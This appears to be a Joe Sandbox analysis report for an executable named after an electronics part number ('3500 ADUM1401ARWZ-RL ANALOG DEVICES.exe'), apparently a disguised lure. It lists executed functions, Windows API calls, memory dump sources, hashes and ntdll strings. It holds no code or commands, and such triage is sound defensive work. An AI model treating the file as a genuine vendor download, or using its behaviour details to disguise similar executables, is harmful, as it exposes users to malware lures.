Analysis Process: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exePID: 1908, Parent PID: 6900COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	4.6%
Signature Coverage:	7.9%
Total number of Nodes:	151
Total number of Limit Nodes:	14

Executed Functions

Function 004176A3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417715

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 169300342ec012082af8d9fc994880b487080d55fc2ea02b2f42f86782b7218c
Instruction ID: 8032e2871f130bd851794bf97cb4884d2b4d7917aea38907c9feabe544edf0a2
Opcode Fuzzy Hash: 169300342ec012082af8d9fc994880b487080d55fc2ea02b2f42f86782b7218c
Instruction Fuzzy Hash: E50175B5E4010DBBDF10DBE5DC42FDEB3789B14308F4041A6E91897240F635EB588755

Function 0042C623 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C65A

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b2f1baa746df9b82b654d29dc8ba6b1483ec87423ca04752226e27f52a4c1a50
Instruction ID: 3285b5226544361fc069aa49d832686e27c4b86d840141d07c3ac01b3e3e78e5
Opcode Fuzzy Hash: b2f1baa746df9b82b654d29dc8ba6b1483ec87423ca04752226e27f52a4c1a50
Instruction Fuzzy Hash: 0AE04F766003147BC110BA9ADC41F9B775CDFC5724F00442AFA1867142C674B90186E5

Function 01742B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01742B6A

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
Instruction ID: 7abe4184fa686f7f5455c3c33466152b3cc673b8a26a15b33b6be8058f1e03f8
Opcode Fuzzy Hash: bcaa65071f60dff3365f4bea986bdab5fe09d35b13606f4c1cecdbe86b2b5f78
Instruction Fuzzy Hash: F890026120640003434571594414616800A97E0201B55C031F50145A0DC5758A916626

Function 01742DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01742DFA

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
Instruction ID: 3b1ddb87a52168808ae43327f2463667d02743fe21dfa92b13464793af2054e6
Opcode Fuzzy Hash: 945009ba6845d8577895c033544c2791e1a0cfcf7e9234a5d362fcb25559eec7
Instruction Fuzzy Hash: C090023120540413D35171594504707400997D0241F95C422B4424568DD6A68B52A622

Function 01742C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01742C7A

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 184b74c935527ad52cf5c16658590fd8caff6f7798e5a2dcf3432f310cfe8e50
Instruction ID: 45dbff39234b14f64be5e7ae5c395754118e1d7706b0eab7d973c9a8e1980548
Opcode Fuzzy Hash: 184b74c935527ad52cf5c16658590fd8caff6f7798e5a2dcf3432f310cfe8e50
Instruction Fuzzy Hash: DD90023120548803D3507159840474A400597D0301F59C421B8424668DC6E58A917622

Function 017435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017435CA

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4fb63c0ae15527ac315c5aebb841aa6a62acac13c0f88e6800584303c048b897
Instruction ID: 3c45f9811f532cf6b4fb82707dff07d38880efc0048497073476681616091b32
Opcode Fuzzy Hash: 4fb63c0ae15527ac315c5aebb841aa6a62acac13c0f88e6800584303c048b897
Instruction Fuzzy Hash: 6E90023160950403D34071594514706500597D0201F65C421B4424578DC7E58B516AA3

Function 00413F64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(6p1225E,00000111,00000000,00000000), ref: 00413F4A

Strings

6p1225E, xrefs: 00413F51, 00413F54
6p1225E, xrefs: 00413F3F, 00413F49, 00413F5A

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6p1225E$6p1225E
API String ID: 1836367815-1667478039
Opcode ID: 010311aa980f3044cb84c1d85d1444b294184a797913d359a6d59ede8df1eea1
Instruction ID: a45616aa79d0e02163cd16257fc5e7fbb0f154f13af077f3611183cebed36258
Opcode Fuzzy Hash: 010311aa980f3044cb84c1d85d1444b294184a797913d359a6d59ede8df1eea1
Instruction Fuzzy Hash: 38115B31C002483ED7205E744C41CEF7B7C9F46369B4982AAF918973E2D7298E878799

Function 00413ED3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(6p1225E,00000111,00000000,00000000), ref: 00413F4A

Strings

6p1225E, xrefs: 00413F51, 00413F54
6p1225E, xrefs: 00413F3F, 00413F49, 00413F5A

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6p1225E$6p1225E
API String ID: 1836367815-1667478039
Opcode ID: c2ff8045dcb34417bdc58db551a26cc4ff07f3946faecb240306874e091fc223
Instruction ID: 60f362a0940cfce6dda9d806c186be605f8ef4bc008e51b0ea51859e10d66d6e
Opcode Fuzzy Hash: c2ff8045dcb34417bdc58db551a26cc4ff07f3946faecb240306874e091fc223
Instruction Fuzzy Hash: 5401D6B2D0121C7EDB10ABE19C81DEF7B7CDF41798F44806AFA1467141D67C4E068BA9

Function 00413E9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(6p1225E,00000111,00000000,00000000), ref: 00413F4A

Strings

6p1225E, xrefs: 00413F51, 00413F54
6p1225E, xrefs: 00413F3F, 00413F49, 00413F5A

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6p1225E$6p1225E
API String ID: 1836367815-1667478039
Opcode ID: 177a64a4dcf4a545f2ed47addb84ff67d25aef82a69c5b8f9f898807cdad3fcd
Instruction ID: 5188887c78a263e57af68f7be29e1221a62fc594d5879b171121f8d6f772c7f6
Opcode Fuzzy Hash: 177a64a4dcf4a545f2ed47addb84ff67d25aef82a69c5b8f9f898807cdad3fcd
Instruction Fuzzy Hash: 6DF08672D011187BDB005AA19C41CEF777CDF41365B05806AF918A7100D67C4E064BA9

Function 0041774E Relevance: 1.6, APIs: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417715

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 0acf6e8eaa42619245093136cb3156d39357627e6e01e0e281c084b58ce4d265
Instruction ID: 9ec8449c858167df5f4cd450033472817cb6a7fe76f99e30165a470dd94393e8
Opcode Fuzzy Hash: 0acf6e8eaa42619245093136cb3156d39357627e6e01e0e281c084b58ce4d265
Instruction Fuzzy Hash: D0115772A4450AEFDB40CFA8D842ADAF7B4EF45314F2002AFE844C7242D776A646CB95

Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E47E,?,?,00000000,?,0041E47E,?,?,?), ref: 0042C982

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 835bb84a35d5a57dde076292a237c20f3e9fca4f4d7fe386b77625b82f773868
Instruction ID: 9fa06dc59e7efc60136ccd5fd109c2575da46a2a5f2e044027e3440b35e105a1
Opcode Fuzzy Hash: 835bb84a35d5a57dde076292a237c20f3e9fca4f4d7fe386b77625b82f773868
Instruction Fuzzy Hash: D4E039B2600214BBD614EE9ADC41E9B33ACEB84710F004829BA18A7241C670B91087B8

Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,7E011C30,00000007,00000000,00000004,00000000,00416F25,000000F4), ref: 0042C9D2

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 90dbaec32cdc58b554b708df99f5bb4fc51eff1bd64b6d4798d9ac3752e57639
Instruction ID: ff0269057434ea61031042b6ba24a573a5fdea196d4f024d16634382da4aaa2a
Opcode Fuzzy Hash: 90dbaec32cdc58b554b708df99f5bb4fc51eff1bd64b6d4798d9ac3752e57639
Instruction Fuzzy Hash: F9E06D726002057BC610EF9ADC41F9B73ACDFC4714F004419FE28A7242DB70B9118AB9

Function 0042C9E3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,526A2937,?,?,526A2937), ref: 0042CA1A

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 8e7bc9f74fc492b8fdb9bdc632024d3252ec6cd2c2d23226f70f54460fffec59
Instruction ID: 47a2521c13b258031edd5d70f56bb4868621a48f1fe5186b74ae9a421b789751
Opcode Fuzzy Hash: 8e7bc9f74fc492b8fdb9bdc632024d3252ec6cd2c2d23226f70f54460fffec59
Instruction Fuzzy Hash: B3E086366002547BD120FA5AEC41FD7775CDFC5714F00442AFA18A7141CA75B90187F9

Function 01742C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01742C24

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0d487c8febd6bf47e4aa1beac6d09340370d64adda86dba9d79105c0fce94c9
Instruction ID: 4120f5aa1f13cdcfec93cfaf7f7068f83afa9ed5482b727c8ca21a76aa83ee9d
Opcode Fuzzy Hash: c0d487c8febd6bf47e4aa1beac6d09340370d64adda86dba9d79105c0fce94c9
Instruction Fuzzy Hash: 26B09B719055C5C7DB51E7645608717B90077D0701F15C071F2030651F4778C1D1E676

Non-executed Functions

Function 01782349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 01782F3F, 01783059
MaxLoaderThreads, xrefs: 017824EC
LdrpInitializeExecutionOptions, xrefs: 0178317D
UnloadEventTraceDepth, xrefs: 017824C0
GlobalFlag2, xrefs: 01782FC0
@, xrefs: 01782B74
ExecuteOptions, xrefs: 017825A0
UseImpersonatedDeviceMap, xrefs: 0178251C
MinimumStackCommitInBytes, xrefs: 01782BB0
MaxDeadActivationContexts, xrefs: 01782D82
DisableExceptionChainValidation, xrefs: 0178275F
RaiseExceptionOnPossibleDeadlock, xrefs: 01782579
CFGOptions, xrefs: 01782967
DisableHeapLookaside, xrefs: 0178246D
minkernel\ntdll\ldrinit.c, xrefs: 01783187
ShutdownFlags, xrefs: 017824A1
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01783176
TracingFlags, xrefs: 01782549
@, xrefs: 01782942
FrontEndHeapDebugOptions, xrefs: 01782489

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 192a0d4030ce1d9d48c27f2531059ec41d6bd3e56db3089087ce38cec885852c
Instruction ID: 22144fbeb7ea1effe99ef5467077377cb3e7f5df00490164185197bc76899a88
Opcode Fuzzy Hash: 192a0d4030ce1d9d48c27f2531059ec41d6bd3e56db3089087ce38cec885852c
Instruction Fuzzy Hash: 2B92AE71688342AFE721EF19C884B6BFBE8BB84711F04491DFA95D7292D770E844CB52

Function 01738620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Invalid debug info address of this critical section, xrefs: 017754B6
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0177540A, 01775496, 01775519
Address of the debug info found in the active list., xrefs: 017754AE, 017754FA
double initialized or corrupted critical section, xrefs: 01775508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754CE
Critical section address, xrefs: 01775425, 017754BC, 01775534
Critical section debug info address, xrefs: 0177541F, 0177552E
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017754E2
corrupted critical section, xrefs: 017754C2
8, xrefs: 017752E3
Thread identifier, xrefs: 0177553A
Critical section address., xrefs: 01775502
Thread is in a state in which it cannot own a critical section, xrefs: 01775543
undeleted critical section in freed memory, xrefs: 0177542B

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: fe7728f141afb6a7b837fa7c85cc45c2cfe75ffce9fd41eb0f42c60f109e265a
Instruction ID: bafe6f8826c1a32e7dad4c35f5596200912477f8b98df7d34398c4f5bd4d999d
Opcode Fuzzy Hash: fe7728f141afb6a7b837fa7c85cc45c2cfe75ffce9fd41eb0f42c60f109e265a
Instruction Fuzzy Hash: 8E8167B1A01358EADB20CB99CC48BAEFBB9EB48714F244259F505B7291D375A940CB60

Function 017329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

RtlpResolveAssemblyStorageMapEntry, xrefs: 0177261F
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01772412
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01772498
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017724C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01772506
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01772624
@, xrefs: 0177259B
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01772409
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017722E4
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01772602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017725EB

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
Instruction ID: 209e66f29b2a47a94a3d12adfaa8a4192a0fb3e74b26f569f4ab25df939ec84b
Opcode Fuzzy Hash: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
Instruction Fuzzy Hash: 4E025FF1D042299BDF21DB54CC84B9AF7B8AB54714F0041EAE619A7243EB309F84CF99

Function 017A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

smss.exe, xrefs: 017A8B8B
heapType, xrefs: 017A8BCB
DefaultBrowser_NOPUBLISHERID, xrefs: 017A8D00
csrss.exe, xrefs: 017A8B80
services.exe, xrefs: 017A8B96
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 017A8BD0
runtimebroker.exe, xrefs: 017A8B73
svchost.exe, xrefs: 017A8B68
SegmentHeap, xrefs: 017A8BE9
lsass.exe, xrefs: 017A8BA1

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
Instruction ID: fc54804f5ac63a9fad4e4ae3019f31109fe5bab0d9014b257b2650179d306853
Opcode Fuzzy Hash: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
Instruction Fuzzy Hash: F251C0715043119BC329DF288848BABFBE8EFD8255F944A6DE999C3241E770D644CBD3

Function 017B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 017B02BF, 017B0362
About to reallocate block at %p to %Ix bytes, xrefs: 017B03BA
Just reallocated block at %p to %Ix bytes, xrefs: 017B05F1
HEAP[%wZ]: , xrefs: 017B0399, 017B04A8, 017B05D0, 017B0675, 017B06CC
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 017B069F
HEAP: , xrefs: 017B03A6, 017B04B5, 017B05DD, 017B0682, 017B06D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017B04D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017B06EA

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
Instruction ID: 7e04ff430cef11b732bb2b15b4958960228f05f1bc2bd387d5d7b254a834aaf2
Opcode Fuzzy Hash: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
Instruction Fuzzy Hash: 23D1B9315002869FDB26DF68C884BEAFBF2FF4A714F18805DF5469B652C7349981CB14

Function 017889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 01788B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01788A3D
VerifierFlags, xrefs: 01788C50
VerifierDebug, xrefs: 01788CA5
VerifierDlls, xrefs: 01788CBD
HandleTraces, xrefs: 01788C8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01788A67

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 228fc5ddb4bd6442262a1077aaf538cce891e9d399e41bf60023f7ebb9e8d3c5
Instruction ID: cb3dab52c9f20cdacb0db1ddd68e11680c3189a800acc9789b8b49869e5febf7
Opcode Fuzzy Hash: 228fc5ddb4bd6442262a1077aaf538cce891e9d399e41bf60023f7ebb9e8d3c5
Instruction Fuzzy Hash: EE9136B16897129FD321FF28C884F1BFBE4AB94724F85455CFA41AB285C7709D01C796

Function 0170EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 0170F299
R, xrefs: 0170EB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0170EB6C
{, xrefs: 01764643
T, xrefs: 0170EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0170EB58

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
Instruction ID: 54113bae73ddb294263b99d80244042e8f0598cbe194577464e900e6c313697e
Opcode Fuzzy Hash: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
Instruction Fuzzy Hash: FFA22774A0562ACFDB75DF19CD887A9FBB5AF49304F1442E9D90AA7290DB309E85CF00

Function 017363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01774258
minkernel\ntdll\ldrinit.c, xrefs: 017740E9, 0177414B, 0177420F, 01774269
Process initialization failed with status 0x%08lx, xrefs: 0177413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017740D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017741FE
_LdrpInitialize, xrefs: 017740DF, 01774141, 01774205, 0177425F

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
Instruction ID: 736b083a5ce269a9998410f8a5347a01e2d37441841b1695b784351fed6cd8a5
Opcode Fuzzy Hash: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
Instruction Fuzzy Hash: 19914A70F41315ABDF35EF58DC88BAAFBA1BB40724F10416CF9126B286D7709A41C791

Function 016F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

LdrpInitShimEngine, xrefs: 017599F4, 01759A07, 01759A30
apphelp.dll, xrefs: 016F6496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01759A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01759A2A
